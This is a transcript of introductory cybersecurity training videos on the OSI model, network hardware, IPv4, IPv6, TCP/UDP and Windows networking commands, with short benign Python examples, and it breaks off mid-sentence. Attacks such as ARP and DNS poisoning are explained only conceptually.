Cybersecurity - Intermediate
In this video, you will learn how to map network hardware and software to the OSI model.
Objectives
[Topic title: The OSI Model. The presenter is Dan Lachance.] In this video, I'll talk about the OSI model. OSI
stands for Open Systems Interconnection. This layered model is used to map communications technologies to a common framework that's accepted internationally. Hardware such as network interface cards, routers, switches, and telephony equipment can easily be mapped to layers of the OSI model, as can software, including
all of the protocols within the IPv4 and IPv6 suites. One way to easily remember the layers in the OSI model
starting from Layer 7 – the application layer – is the mnemonic "All People Seem To Need Data Processing"
where each letter stands for the first letter of the layer of the OSI model. Layer 7 is application, Layer 6 is
presentation, Layer 5 is session, Layer 4 is transport, Layer 3 is network, Layer 2 is data-link, and finally Layer
1 of the OSI model is physical.
Let's dive into each of these in a bit more detail. Layer 1 of the OSI model is the physical layer. It's concerned
with the electrical specifications and cables, connectors and various wireless communication specifications.
Layer 2 of the OSI model is called the data-link layer. Its purpose is to deal with accessing the network
transmission medium such as trying to make a connection and transmitting data on an Ethernet or a Token
Ring network. The data-link layer or Layer 2 also deals with Media Access Control or MAC addresses. These
are also called Layer-2 addresses, hardware addresses, or in some cases, physical addresses. But it all means
the same thing. It's a 48-bit hexadecimal unique identifier for a network interface, such as we see here. [For
example: 90-48-9A-11-BD-6F.]
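As a quick illustration – this is just a minimal Python sketch added for clarity, not part of the course demo – you can check whether a string looks like a valid 48-bit MAC address with a simple pattern match:

```python
import re

# A 48-bit MAC address is six hexadecimal octets, commonly separated
# by hyphens or colons (e.g. 90-48-9A-11-BD-6F).
MAC_PATTERN = re.compile(r"^([0-9A-Fa-f]{2}[-:]){5}[0-9A-Fa-f]{2}$")

def is_valid_mac(address: str) -> bool:
    """Return True if the string looks like a 48-bit MAC address."""
    return bool(MAC_PATTERN.match(address))

print(is_valid_mac("90-48-9A-11-BD-6F"))  # True
print(is_valid_mac("90-48-9A-11-BD"))     # False: only 40 bits shown
```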
The network layer – Layer 3 of the OSI model – deals with IP, the Internet Protocol. It's also responsible for
dealing with the routing of packets to remote networks and the sharing of routing tables between routing
equipment. The IP address is also called a Layer-3 address. With IPv4, it's a 32-bit address such as
199.126.129.77. But, with IPv6, it's much longer, specifically four times longer – 128 bits long. And it's
expressed in hexadecimal. And each segment or each 16 bits is separated with a colon as we see in the example
listed here. [The example is: FE80::883B:CED4:63F3:F297.] Now, when you see a double colon side by side
like we see here, it means we've got a series of zeros in there.
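To see that zero-compression rule in action, here's a small Python sketch (an editorial aside using the standard ipaddress module) that expands and compresses the example address:

```python
import ipaddress

# The double colon stands in for one contiguous run of zero hextets.
addr = ipaddress.IPv6Address("FE80::883B:CED4:63F3:F297")

print(addr.compressed)  # fe80::883b:ced4:63f3:f297
print(addr.exploded)    # fe80:0000:0000:0000:883b:ced4:63f3:f297
```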
Layer 4 of the OSI model is the transport layer. It's concerned with the end-to-end transmission of packets.
And so protocols like TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) map to Layer 4. TCP ensures that packets are received by a target. So it's a very careful protocol. UDP is the polar
opposite. It doesn't guarantee the packets are being received by the target. It simply sends them out with the
best effort. The port address identifies a running network service that clients can connect to. So a Layer-4
address is a port address. So, for example, web servers listen on TCP port 80 and DNS servers listen on UDP
port 53 for client connections.
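As a small aside, most operating systems ship a services database that maps these well-known Layer-4 addresses to service names. A minimal Python sketch (assuming a standard services file is present on the host) looks like this:

```python
import socket

# Well-known port numbers are Layer-4 addresses; the OS services
# database maps service names to ports and back again.
print(socket.getservbyname("http", "tcp"))    # 80
print(socket.getservbyname("domain", "udp"))  # 53 (DNS)
print(socket.getservbyport(443, "tcp"))       # https
```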
Layer 5 of the OSI model is the session layer. It deals with communication session creation, maintenance, and
tear down. But it doesn't imply that users are logging into something. This can happen internally within the
software without the user even knowing a session is being established. This is often used by network
programmers to initiate a call to a function on a remote network host using what are commonly called RPCs –
remote procedure calls. The session layer also deals with things like half-duplex communication, where we
have communication being transmitted in one direction at a time as opposed to full duplex, which is
bidirectional simultaneous communications where, for instance, we could send and receive at the exact same
time.
Layer 6 of the OSI model is the presentation layer. Its concern is with how data is presented between
communicating hosts. So there are differing character sets that we might be dealing with. We might have
encryption and decryption that have to be dealt with depending on whether we're using a secured transmission
or not. There is also compression and decompression that can be dealt with. Then all of these things occur at
the presentation layer of the OSI model.
Layer 7 – the highest level – is the application layer. This is where higher-level protocols function, such as HTTP
(the Hypertext Transfer Protocol) or SSH (Secure Shell) to name just a few. However, the application layer
doesn't necessarily imply that it has to involve user interaction, for instance, to run an application. So the OSI
model then is a conceptual model that we use to map network hardware and software to a common framework
that is accepted internationally. In this video, we discussed the OSI model.
In this video, find out how to identify when to use specific network hardware.
Objectives
[Topic title: Network Hardware. The presenter is Dan Lachance.] Being a cybersecurity analyst means
understanding not only the details about communication software, but also the underlying hardware that makes
it happen. In this video, we'll talk about network hardware. Network hardware begins with cables such as
copper wires. Now copper wire cabling is used to transmit electrical signals down the copper wires.
Commonly, we will see unshielded twisted pair or UTP and shielded twisted pair – STP – cables. Shielded
twisted pair cables are less susceptible to external interference as signals travel down the copper wires. Copper
wires are also potentially susceptible to wiretapping, which allows other individuals to capture the signals that
are being transmitted.
Now compare that to fiber optic cabling, which transmits pulses of light instead of electricity. This happens
over glass or plastic fibers. And it's much more difficult to intercept signals than it would be with wiretapping
on copper wire-based cables. The network interface card is another piece of hardware that exists in
communicating devices. It's called a Layer-2 device. It might be a wired NIC. So, for example, server
hardware physically might have three or four NICs or we might have a Wi-Fi NIC built into a laptop or a
smartphone, same goes for Bluetooth. Either way, if it receives and transmits on a network, it's a network
interface card. Network interface cards have a hardware or MAC address, which is called a Layer-2
address. [MAC address is also called a hardware address and a physical address.]
Now this is the 48-bit hexadecimal unique identifier [For example: 90-48-9A-11-BD-6F.] for a network
interface on the local area network only. The MAC address can also be spoofed so a malicious user could use
freely available software to make their device look like some other valid device that has a trusted MAC address.
NICs also support multihoming in a device where there is more than one NIC. And we'll often see this in
firewall devices. NIC teaming allows multiple network cards to work together for the purposes of
either load balancing or aggregated bandwidth. The other way we can look at this is even a single network
interface card could have multiple IP addresses. And you might find that happening if you've got, for instance,
a web server hosting multiple different web sites each on a different IP address.
So each network interface card can also have different network traffic rules applied that control what traffic is allowed in or out through that card. And that's especially relevant in multihomed firewall
devices. Routers have at least two NICs if not more, so they can take traffic in from one interface and route it
to a network through a different interface. Layer-2 and Layer-3 switches supersede hubs. They are the central
connectivity point in a star-wired network. And they are very common. Managed switches are managed
usually over a secure protocol such as HTTPS or SSH as opposed to HTTP or Telnet, which are not considered
secure for transmission of credentials. A managed switch is called managed because you can remotely manage
it and configure and tweak how the ports behave and so on. Lower end or cheaper switches will still function
as a central connectivity point. But you can't really configure them in any way because they wouldn't be
managed.
We can also configure a monitoring port on a switch so that we can capture network traffic. Now the nature of
a switch is that any traffic sent between two nodes is only seen by those nodes and not every other port in the
switch. So, if we want to capture all network traffic in a switch, we usually put our device into – let's say – port
1 of a switch, configure port monitoring for all the other ports so that it copies all the packets to port 1 where
we're running our packet capturing tool or software. Within a switch, we can configure a VLAN – a virtual local area network. This allows for network traffic segmentation. We might do this for performance, since having smaller networks as opposed to one big one is much more efficient. Also, for security,
we might, for instance, want storage area network traffic in the form of iSCSI to occur on a separate VLAN
from regular user traffic.
All ports on a switch are in a single VLAN by default. But, of course, this can be changed on a managed
switch. VLAN membership can be determined by the physical port that a cable is plugged into on the switch or
it could even be the IP address of the plugged-in device and so on. A router is a Layer-3 device. And it's a crucial
part of network hardware that sends traffic from one network to another. Without routers, the Internet could
not exist. Routers have at least two network interfaces. They do not forward network broadcasts. And the
reason for this is due to security and performance.
Routers can be configured with packet filtering rules. In this way, they're considered a Layer-4 type of firewall
because they can block up to and including the port address for a network service. Of course, they can also
allow or deny traffic based on IP address and things like that. Routers need to be configured with the correct IP
addressing in order to route traffic correctly. Network devices point to the router interface on their subnet as
the default gateway. And that's how a device on a network can communicate outside of the local area network.
Routers maintain their own routing tables in memory. So routers have memory just like a regular PC. And a
routing table lists the best way to transmit packets to a remote network. So the routing table contains things
like network addresses. There could be multiple routes to the same location but with different efficiencies.
We can also allocate – or it might automatically be determined – the routing cost. The routing cost is used to
determine which path we should take when we have multiple paths to the same destination. Routers also share
routing information with other routers using routing protocols, such as RIP – the Routing Information
Protocol; OSPF – Open Shortest Path First; and BGP – the Border Gateway Protocol. Routers are ideally
managed over the network by administrators via HTTPS or SSH as opposed to the insecure counterparts of
HTTP or Telnet.
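To make the routing-table idea concrete, here's a toy Python sketch (illustrative only – it isn't how any particular router or routing protocol is implemented) showing longest-prefix matching plus a cost tie-breaker over a hand-built table:

```python
import ipaddress

# A toy routing table: (destination network, next hop, cost/metric).
routes = [
    (ipaddress.ip_network("0.0.0.0/0"), "192.168.1.1", 10),    # default route
    (ipaddress.ip_network("10.0.0.0/8"), "192.168.1.254", 5),
    (ipaddress.ip_network("10.1.0.0/16"), "192.168.1.253", 5),
]

def next_hop(destination: str) -> str:
    dest = ipaddress.ip_address(destination)
    matches = [r for r in routes if dest in r[0]]
    # Prefer the most specific prefix; among equals, prefer the lowest cost.
    best = max(matches, key=lambda r: (r[0].prefixlen, -r[2]))
    return best[1]

print(next_hop("10.1.2.3"))  # 192.168.1.253 - the /16 wins over the /8
print(next_hop("8.8.8.8"))   # 192.168.1.1   - falls back to the default route
```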
In our diagram, we see two routers – router 0 and router 1. [The Routing Diagram is displayed on the screen.
It shows router0 interconnected to host0, host1, and router1. The router1 is further interconnected to host2
and host3.] Now, if we take a look at our diagram in the upper left, we've got host0 and then bottom left, we've
got host1. Now, in order for those devices to send traffic through router0 – if they're on the same local area
network – they need to point to the network interface for router0 on their local subnet. Now router0 would then
be connected in some way to router1. And sometimes the connection between routers is called a backbone. So
then the traffic could be routed to router 1. Now, in the same way, in our diagram, the devices over on the right
hosts – host2 and host3 – would have to point to the IP address of the network interface for router1 on their
local area network. So the theme here is that you can't point to a router interface that's not on your local area
network because how would you get to it in the first place because that's the purpose of the router or as it's
called in IP networks, the default gateway.
Wireless access points and routers are considered Layer-2 and Layer-3 devices. This is because they deal with not only IP addresses – Layer-3 addresses – but also MAC addresses, Layer 2. Wireless access points and routers allow wireless connectivity for Wi-Fi networking and Bluetooth, and they also create a wireless local area
network or WLAN. They often have a wired connection to network infrastructure. And they're ideally
managed like network equipment should be over a secure protocol such as HTTPS or SSH. Other network
equipment that we might encounter include appliances of various types like hardware encryption and
decryption devices, Voice over IP, and telephony integration devices, which should be placed on a separate
VLAN for performance and security reasons. We might also have hardware firewalls, hardware VPNs, and
also different types of computing appliances in manufacturing and industrial environments. In this video, we
discussed network hardware.
[Topic title: IPv4. The presenter is Dan Lachance.] In this video, I'll talk about IPv4. IPv4 or Internet Protocol
version 4 is what's in use on the Internet today as a communication software protocol. It's also widely used on
internal enterprise networks. And it stems from the 1970s. However, IPv4 was not designed initially with
security in mind. So any application-specific transmission security has been an afterthought since the 70s such
as HTTPS to secure an HTTP web server. However, HTTPS is specific to the web server. So, if we wanted to
secure 20 web servers, we would have 20 configurations to go through. Alternatively, with IPv4 we can use
IPsec – IP security, which is not application specific.
So, for example, if we enabled IPsec on all of our internal clients and servers, then what it means is –
regardless of which transmission protocol is being used – everything would be encrypted and potentially even
digitally signed. IP addresses are 32 bits long, for example 199.126.129.77. So they're expressed in decimal
form or base 10 where each eight bits or byte is separated with a dot. The subnet mask determines which part
of the IP address identifies the network versus the host. And the subnet mask is expressed again either in
decimal (base 10) form or in CIDR form. So, in our example, where we have an IP address of 199.126.129.77, if
our subnet mask happens to be 255.255.255.0 that means that the first three bytes identify the network. And, in
this case, that means the network is 199.126.129. So the last number 77 then would be a host on the network.
Now, with the 255s, that is the subnet mask being expressed in decimal form. In shorthand, it would be simply
/24, which identifies the number of binary bits within the subnet mask. There are some special IPv4 addresses
like the local loopback, which has an address of 127.0.0.1 on a device. And we use this if we're testing our
local IP stack when troubleshooting. There are also Automatic Private IP Addressing (APIPA) addresses. They have a prefix of 169.254. And a device will be configured with one of these when it can't contact a DHCP server. Now this APIPA address is only usable to communicate with other APIPA hosts on the local
area network only. An address of 0.0.0.0 means that there is not yet an address that's been assigned to a device.
In the routing context, 0.0.0.0 means the default route.
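Here's a brief Python sketch (an editorial illustration using the standard ipaddress module) that reproduces the subnet-mask math above and recognizes a few of those special ranges:

```python
import ipaddress

# The /24 mask (255.255.255.0) says the first three octets identify the network.
iface = ipaddress.ip_interface("199.126.129.77/24")
print(iface.network)   # 199.126.129.0/24
print(iface.netmask)   # 255.255.255.0

# Recognizing some of the special addresses mentioned above.
print(ipaddress.ip_address("127.0.0.1").is_loopback)        # True
print(ipaddress.ip_address("169.254.10.20").is_link_local)  # True (APIPA)
print(ipaddress.ip_address("192.168.1.5").is_private)       # True (RFC 1918 range)
```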
Network broadcasts for all networks have an address of 255.255.255.255. So all of the binary bits are set to
one. [Network broadcasts are used to transmit packets to all devices on all networks.] Routers don't forward
broadcasts. Then there are three private ranges of IP addresses designed to be used internally by companies
that will not be routed by Internet routers. They are the 10.0.0.0/8 range, the 172.16.0.0/12 range, and the 192.168.0.0/16 range. Now there are variations. So instead of 192.168.0.0/16, for example, in a home wireless network, we
might instead have 192.168.1.0 with a /24 subnet mask. There are additional IPv4 settings to keep in mind beyond the IP address, the subnet mask, and the special addresses. The default gateway is the IP address of a
router interface on your network that you use to communicate outside of the LAN.
There could be multiple default gateways on a single LAN. And you could send traffic through them
depending on where the destination is. Now one of the dangers with routers and default gateways is ARP cache
poisoning. If a malicious user can get on the network, then they could set up a malicious host that sends out a
periodic update to every device on the network claiming to be the router. In other words, basically, telling
everyone to update the MAC address that you have stored in memory for the router with my MAC address. What it means is that all the traffic then gets routed through the malicious host, which would then probably continue sending it on through to the Internet. The bad part is that all traffic would be seen by
the malicious user.
For example, here I'm going to type ipconfig in a Windows command prompt. Now, for my network interface,
what I want to do is take a look at the default gateway. So here I see a default gateway address for my Wi-Fi
adapter. And the address is 192.168.1.1. If I clear the screen and then type arp -a, it shows me the ARP cache in memory on my client station, which basically shows me the physical MAC addresses for devices on my
LAN and the corresponding IPs. Now I can see here I've got an entry for 192.168.1.1 along with the physical
or MAC address of my router. So ARP cache poisoning sends out an update that changes this physical address
for the default gateway. Essentially, tricking machines into sending traffic that's destined for the default
gateway to the malicious host.
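One quick way to hunt for this kind of tampering is to look for a single MAC address claiming multiple IPs in the ARP cache. The helper below is a hypothetical Python sketch that shells out to arp -a (output formats vary by OS, and duplicates can also be legitimate – broadcast and multicast entries, or a multihomed host – so treat hits as leads, not proof):

```python
import re
import subprocess
from collections import defaultdict

def suspicious_arp_entries():
    """Flag MAC addresses that appear against more than one IP in 'arp -a'."""
    output = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
    macs = defaultdict(set)
    # Grab IP/MAC pairs that appear on the same line of output.
    pattern = r"(\d{1,3}(?:\.\d{1,3}){3}).*?([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})"
    for ip, mac in re.findall(pattern, output):
        macs[mac.lower().replace("-", ":")].add(ip)
    return {mac: ips for mac, ips in macs.items() if len(ips) > 1}

print(suspicious_arp_entries())
```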
So it's paramount then that we protect how people get on our network in the first place. The next big IPv4
setting would be the domain name service server or DNS server or servers. It's the IP address of one or more
lookup servers. And they also do not have to be on your network like the default gateway does. It allows
connecting to a service by name which is easy to remember versus the IP address which is difficult to
remember. You should configure more than one DNS server. So, if one fails, devices can still resolve names to IP addresses by failing over to the next DNS server configured. One danger with DNS – and there are many
– is DNS poisoning which is also called DNS spoofing. Essentially, this redirects legitimate traffic to a
malicious host. So you can imagine, if you frequent your online banking site and a malicious user hacks into a
DNS server that you point to, they could redirect that same URL – that friendly name you're used to typing in –
to the IP address of a web server under their control that looks like the real website but isn't. And it will be
used to gather your online banking credentials.
IPv4 port address translation allows Internet access through a single public IP address on the PAT router. It
also hides the internal IP addressing scheme for internal hosts going through the PAT router. And it doesn't allow connections initiated from the Internet to internal hosts. Pictured in our diagram, we see three
hosts on the inside network with addresses such as 10.0.0.1, 10.0.0.2, and 10.0.0.3. They would be configured
to point to their default gateway, which is just a router, which in turn is configured with port address
translation. Now that gets them out to the Internet. Now what's interesting about this is a PAT router has a
memory table where it tracks the inside local addresses – the internal addresses – as well as an inside global address.
Now the inside global would use the public IP address of the PAT router along with the unique port identifier
which we see here in the form of 1000, 1001, and 1002. So it knows how to get traffic back into a host that
requested something on the inside. In this video, we talked about IPv4.
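To picture that translation table, here's a toy Python sketch of the bookkeeping a PAT router does (purely illustrative – the addresses and port numbers are made up, and real PAT also tracks protocol and timeouts):

```python
import itertools

PUBLIC_IP = "203.0.113.10"          # the router's single public address (example value)
_next_port = itertools.count(1000)  # unique public-side port per inside connection
_table = {}                         # (inside IP, inside port) -> public port

def translate_outbound(inside_ip, inside_port):
    key = (inside_ip, inside_port)
    if key not in _table:
        _table[key] = next(_next_port)
    return (PUBLIC_IP, _table[key])

def translate_inbound(public_port):
    for (inside_ip, inside_port), port in _table.items():
        if port == public_port:
            return (inside_ip, inside_port)
    return None  # no mapping: unsolicited Internet-initiated traffic is dropped

print(translate_outbound("10.0.0.1", 51000))  # ('203.0.113.10', 1000)
print(translate_outbound("10.0.0.2", 51000))  # ('203.0.113.10', 1001)
print(translate_inbound(1001))                # ('10.0.0.2', 51000)
print(translate_inbound(4444))                # None
```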
After completing this video, you will be able to understand IPv6 settings.
Objectives
[Topic title: IPv6. The presenter is Dan Lachance.] In this video, I'll talk about IPv6. IPv6 is Internet Protocol
version 6. It's not as widely used currently as IPv4, which is ubiquitous everywhere on the Internet. However,
it was designed with security in mind in the form of IPsec. It was also designed with media streaming or
quality of service in mind for applications that might deal with audio, video streaming, or Voice-over-IP
transmissions over a packet-switched network. In IPv6, interestingly, there is no such thing as broadcasting as there is in IPv4. IPv4 dealt with subnet broadcasts, all-networks broadcasts, ARP broadcasts, DHCP discovery broadcasts, and so on. That doesn't exist with IPv6. What does exist is unicast from one to one, which is also possible with IPv4, as is multicast. So a multicast transmission goes from one
device to a group of registered listening devices on that multicast address.
In IPv6 that's used for Neighbor Solicitation messages to discover other IPv6 devices on the network. IPv6 has
something that IPv4 doesn't in the form of anycast transmissions. Now, an anycast transmission is similar to a multicast, but the distinction is that it seeks out only the nearest member of the group. IPv6 addresses are
128 bits long. And they're expressed in hexadecimal. Now hexadecimal means that we've got letters A through
to F, where A is used for number 10 and F is used for number 15. Of course, we have our standard 0 through to
9 for our regular digits. [For example: FE80::883B:CED4:63F3:F297.]
Now, with IPv6 addresses, each 16 bits – we'll call that a hextet – is separated not by a period but rather by a
full colon. Seen in our example, you can use a double colon once within an IPv6 address to represent a series
of zeros, which is really the absence of a value. With IPv6, the subnet prefix length determines which portion
of the IP identifies the network versus host. So it's kind of like the subnet mask in IPv4. And it can be
expressed in CIDR form, which it normally is, such as /64, which means there are 64 bits in the subnet prefix.
There are special IPv6 addresses such as ::1 which means local loopback. This is used when troubleshooting
our local IP stack. Addresses beginning with fe80 are self-assigned link-local addresses in IPv6. And this will
always exist on an IPv6 host. It allows LAN communication only, and it lets the host discover other nodes on that network.
Here, in a Windows command prompt, if I were to type ipconfig and I'm running Windows 10 on this station, I
would see that I've got IPv6 addresses available. For example, for my Wi-Fi adapter, I don't have any IPv6
because it's disabled for that adapter. But, if I take a look up at my connection Ethernet 3 here, I see that I've
got both a Link-Local IPv6 Address. So it begins with fe80, and that never goes away. Well, the only way it
goes away, of course, is if you turn off IPv6 entirely on your network interface.
I've also got another IPv6 Address that was manually assigned to this interface in the form of 1:2:3:4::1, where the double colon stands for a series of zeros. IPv6 addresses starting with ff00 are multicast addresses. If the prefix is 2000, then
it's called a global unicast packet transmission, which is essentially a public IPv6 address. Other settings for
IPv6 are very similar to additional settings for IPv4 such as the default gateway. The IP address of a router on
your network allows communication outside of the LAN. And, of course, there could be multiple default
gateways. You're not limited to having only one. DNS servers play the same role in IPv6 as they do with IPv4.
They are look-up servers that do not have to be on your network. And they allow connection to services by
name, which is easier to remember than the IP address, especially with IPv6. The interesting thing about this, of course, is that when we build a host record in a DNS zone – a look-up record that maps a name to an IP address – in IPv4 that's called an A record. In IPv6, it's called
a quad A record or A-A-A-A. In this video, we discussed IPv6.
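Tying that quad-A idea back to code, here's a short Python sketch (assuming your resolver is reachable and the name actually publishes AAAA records; otherwise it raises socket.gaierror) that asks only for IPv6 answers:

```python
import socket

def aaaa_lookup(name: str):
    """Return the IPv6 addresses (AAAA records) the resolver gives back for a name."""
    results = socket.getaddrinfo(name, None, family=socket.AF_INET6)
    return sorted({entry[4][0] for entry in results})

print(aaaa_lookup("www.google.com"))
```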
[Topic title: TCP and UDP. The presenter is Dan Lachance.] In this video, we'll talk about TCP/IP's transport
mechanisms – TCP and UDP. TCP and UDP are protocols that apply to Layer 4 of the OSI model. Higher
level apps need some kind of a transport mechanism. And that comes in the form of either TCP or UDP.
Usually, it's determined by the software developer, but some network services will allow admins to change
whether the listening port uses TCP or UDP. TCP is the Transmission Control Protocol. It
establishes a session with a target before transmitting any data. It's considered connection oriented because it
sets up a three-way handshake before transmitting data. In packet number one, the initiator sends what's called
a SYN packet to the target. This means synchronize. It's used to synchronize sequence numbers, which are
used to number the transmitted packets.
Then the target will send back a SYN-ACK to acknowledge that yes, we're going to agree on our starting
sequence number. The sender or the initiator in number three then acknowledges the acknowledgement to the
original SYN packet. [That is, SYN-ACK ACK.] After this has been completed, the connection is established
and data may be transferred. However, what's interesting is that the sender will require an acknowledgement
for each and every packet that is sent because TCP, aside from being connection oriented, is also a very
careful and reliable protocol. Common TCP header fields include things that we might see within an HTTPS
packet such as the source port number. Now notice, in our diagram, the source port number is 59591 – that's a
pretty high-level port number, whereas the destination port number is HTTPS port 443.
What this is telling us is that this is a transmission from a client web browser to a secured web server because
secured web servers listen on port 443, but communicate back with clients on a higher-level port, in this case
59591. Now we can also see that there would be a sequence number, [The sequence number is 1453.] which is
tracked by both ends of the connection for the transmission of packets within the session. There is also the next
sequence number. [The next sequence number is 1554.] There is an acknowledgement number [The
acknowledgement number is 698.] and a checksum [The checksum number is 0x2bbf.] to ensure that what is
received is what was sent. Now, from a security perspective, it's important to know these internal workings
because a lot of malicious attacks take advantage of these. And they might use overlapping sequence numbers
to crash a host. Or, as a matter of fact, a malicious user can actually forge every item within a packet, the
payload, the headers. All of this stuff can be forged by a malicious user with freely available tools.
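From an application's point of view, all of that handshaking and acknowledgement happens inside the operating system's TCP stack. A minimal Python sketch (assuming outbound access to a public HTTPS site) that triggers the SYN / SYN-ACK / ACK exchange is just a connect call:

```python
import socket

# create_connection() performs the three-way handshake for us; the OS stack
# then handles sequence numbers, per-segment ACKs, and retransmission.
with socket.create_connection(("www.google.com", 443), timeout=5) as s:
    local_port = s.getsockname()[1]
    remote_ip, remote_port = s.getpeername()[:2]
    print(f"Connected from ephemeral port {local_port} to {remote_ip}:{remote_port}")
```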
UDP is the User Datagram Protocol. It's another transport mechanism besides TCP. It's considered
connectionless where TCP is connection oriented. So therefore, with UDP a session is not established before
transmitting data. So, in other words, it simply sends out the traffic, which hopefully gets received by the intended
recipient. There is no checking. So the sender does not require an acknowledgement for every sent packet. So,
because there is no session per se with UDP, firewalls then treat every packet as a unique connection. UDP
header fields are few compared to TCP. So, in this case, we have a DNS query packet where the source port
number is a high-numbered port. [The source port number is 57035.]
Now remember port numbers are also called Layer 4 addresses. The destination port in this example is domain
or UDP port 53. What this is telling us is that this is coming from a client device, so a higher source port
destined to a DNS server. It's some kind of a DNS query. Now we'll also see other fields such as the length of
the transmission in bytes. So, in this case, 60 and a checksum value [The checksum value is 0x5532.] to ensure
that what is received is what was sent. Now it's important that we understand common TCP and UDP port
numbers. Now you might ask why is this relevant. This is important because network scanning, which can be
conducted legitimately or by malicious users for reconnaissance, can identify services based on the listening
port number.
Now, if a malicious user scans a network and sees port 25 on TCP, they're going to know that that's SMTP and
they might probe that further to discover the type of mail server you're running and then find vulnerabilities for
it. So on TCP, port 22 is for SSH – Secure Shell – which is used as a secured remote administration command
line tool. Port 25 over TCP is for the Simple Mail Transfer Protocol for transferring mail between mail servers on the Internet. TCP port 80 is for HTTP web servers, TCP 443 – secured HTTP web servers, TCP
3389 is used by Remote Desktop Protocol to remotely administer Windows hosts.
On the UDP side, we've got port 53, which is for DNS client queries going to a DNS server. And we also have
UDP ports 67 and 68 used for DHCP when a client needs to acquire an IP configuration from a centralized
DHCP server. Now there are many, many other port numbers for different network services, this is just a tiny
sampling. There is then the notion of stateful packet inspection. Stateful packet inspection devices track packets belonging to a TCP session, so they know that a session is established. And they don't treat each
individual packet as a separate connection as is the case with UDP. So that would be called stateless packet
inspection where the device is unaware of data transmission patterns. Now, in some cases, when you look at
firewall solutions – be they hardware or software based – it might be a stateful packet inspection device or
stateless. Ideally, we want a stateful packet inspection device that can do both. In this video, we discussed TCP
and UDP.
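To contrast that with UDP's fire-and-forget behaviour, here's a hedged Python sketch that hand-rolls a tiny DNS query for example.com and sends it as a single datagram to a public resolver (8.8.8.8 is assumed reachable; a real client would use a resolver library, and if no reply arrives the recvfrom simply times out):

```python
import socket

# A minimal DNS A query: 12-byte header, then the question section.
query = (
    b"\x12\x34"                            # transaction ID
    b"\x01\x00"                            # standard query, recursion desired
    b"\x00\x01\x00\x00\x00\x00\x00\x00"    # 1 question, 0 answer/authority/additional
    b"\x07example\x03com\x00"              # QNAME: example.com
    b"\x00\x01\x00\x01"                    # QTYPE=A, QCLASS=IN
)

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.settimeout(3)
    s.sendto(query, ("8.8.8.8", 53))  # no handshake, no delivery guarantee
    data, server = s.recvfrom(512)
    print(f"Received {len(data)} bytes back from {server[0]}")
```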
understand which Windows tools to use when configuring and troubleshooting TCP/IP
[Topic title: Use Common Windows TCP/IP Utilities. The presenter is Dan Lachance.] In this video, we'll take
a look at some common Windows TCP/IP utilities. Both Windows client/server operating systems include a
number of built-in tools that we can use to test and troubleshoot IP connectivity. Let's start here in a Windows
command prompt on a Windows 10 station by typing ipconfig. Here it returns my network interfaces with a bit
of information related to IP settings for each. So, for example, as I scroll down, if I look at my wireless LAN
adapter which I've called Wi-Fi, I can see my DNS Suffix name, my IPv4 Address, my Subnet Mask, and my
Default Gateway. Of course, if I were to type ipconfig /all, I would get much more information for each
network interface. Let's go back and take a look at my Wi-Fi adapter [Dan refers to the information regarding
Wireless LAN adapter Wi-Fi displayed in the output.] because now I can see the description of the type of Wi-
Fi adapter it is. I can see the Physical Address otherwise known as the MAC address for my Wi-Fi adapter. I
can also see that I've got a DHCP Server listed here along with Lease Obtained and expiry information. So of
course this is a DHCP client. [Other information regarding Wi-Fi adapter displayed in the output is: IPv4
Address, Subnet Mask, Lease Expires, and Default Gateway.]
I can also see the various DNS Servers that this station is pointing to for name resolution. So I'm going to type
cls to clear the screen. Let's take a look at a couple of other things here. Now, for DHCP clients, of course, we could type ipconfig /release to release our IP settings in their entirety back to the DHCP server. And then we could type ipconfig /renew to renew them. Now sometimes you might do this if
there is some kind of a problem receiving IP settings from DHCP. I'm not going to do that here because I do
have a valid connection. But I'm going to use the ping command. I'll start by pinging an IP address. [He
executes the following command: ping 192.168.1.1.] Here of course, if I get a reply, then I know that that
device or host is up and running and replying on that address. Bear in mind though, in this day and age, ICMP packets, which ping uses, are often blocked. And therefore, you may not get a ping reply.
We can also ping by name. If I type ping www.google.com, then we should see that it resolves it to an IP
address and that we're getting a reply from it. So we know DNS is working. We also know that google.com is
not blocking ICMP packets, at least not the type for echo replies. At the same time, we can also work with
IPv6 if we've got IPv6 enabled. If I were to type ping -6 and then put in www.google.com – if we've got a
record in DNS specifically a quad A record, an A-A-A-A record, for google.com – it would return the IPv6
address. Of course, we would need to have IPv6 enabled for that to be successful. But ping really tells you
whether or not you're getting a response. If you're not getting a response, you don't really know if it's the target
host, the endpoint that's not available or if it's some router in between that's a problem. And that's where the
traceroute command tracert comes in. So I type tracert let's say www. – I'll pick a different host here –
eastlink.ca. [He executes the following command: tracert www.eastlink.ca.]
The first thing I'm going to do is see it's going to give me a response as it goes through my local default
gateway. Then, for each gateway that it goes through, I'll get a separate listing here. We're starting to see this
on the screen on separate lines. We also have three samples of the response time going through that
gateway. And, in some cases, some of the routers will return a name. So I can identify the service provider, in
this case the Internet service provider. And, in some cases, even geographically if it's a router that's in New
York or Montréal or Vancouver and so on. So tracert then shows me how far down the line I'm getting,
whereas ping just tells me whether or not a device is responding or not. I'm just going to press Ctrl+C here to
end this traceroute operation.
Now the next command we're going to take a look at here is the netstat command. If I type netstat and press
Enter, what it's going to do is show me any local listening port numbers that I have. [The output is displayed in
a tabular format with the following column headers: Proto, Local Address, Foreign Address, and State.] So,
for example, if I'm running a web server, I would have port 80 or 443 under Local Address and any foreign
address would be connections elsewhere connected to my web server. Now the same thing is true in the
opposite direction. You noticed here, the third listing from the top here is connected to the https port on
another foreign host, [He points to the third row in the table. The entry under Proto column is TCP, the entry
under Local Address column is 192.168.1.157.54236, the entry under Foreign Address column is iz-in-
f188:https, and the entry under State column is ESTABLISHED.] in other words port 443. Of course, if I look
under the Local Address column for that third entry down, it connects back to my local machine on a higher-
level port. So we can see all of the connections that have been established in this case over TCP. Although the
netstat command has numerous command-line switches that will let you look at UDP ports and so on.
So, once again, we've got to press Ctrl+C to cancel that operation. And I'm going to type cls to clear the screen.
Another important command is arp, which is related to IP address to MAC address resolution. It stands for
Address Resolution Protocol. I'm going to type arp -a to show all entries in the ARP cache. Now, when I do
that, I have it listed per interface. And, in the Internet Address column on the left, I see the IP address. And, in
the corresponding column to the right labeled Physical Address, I see the hardware address. The way this
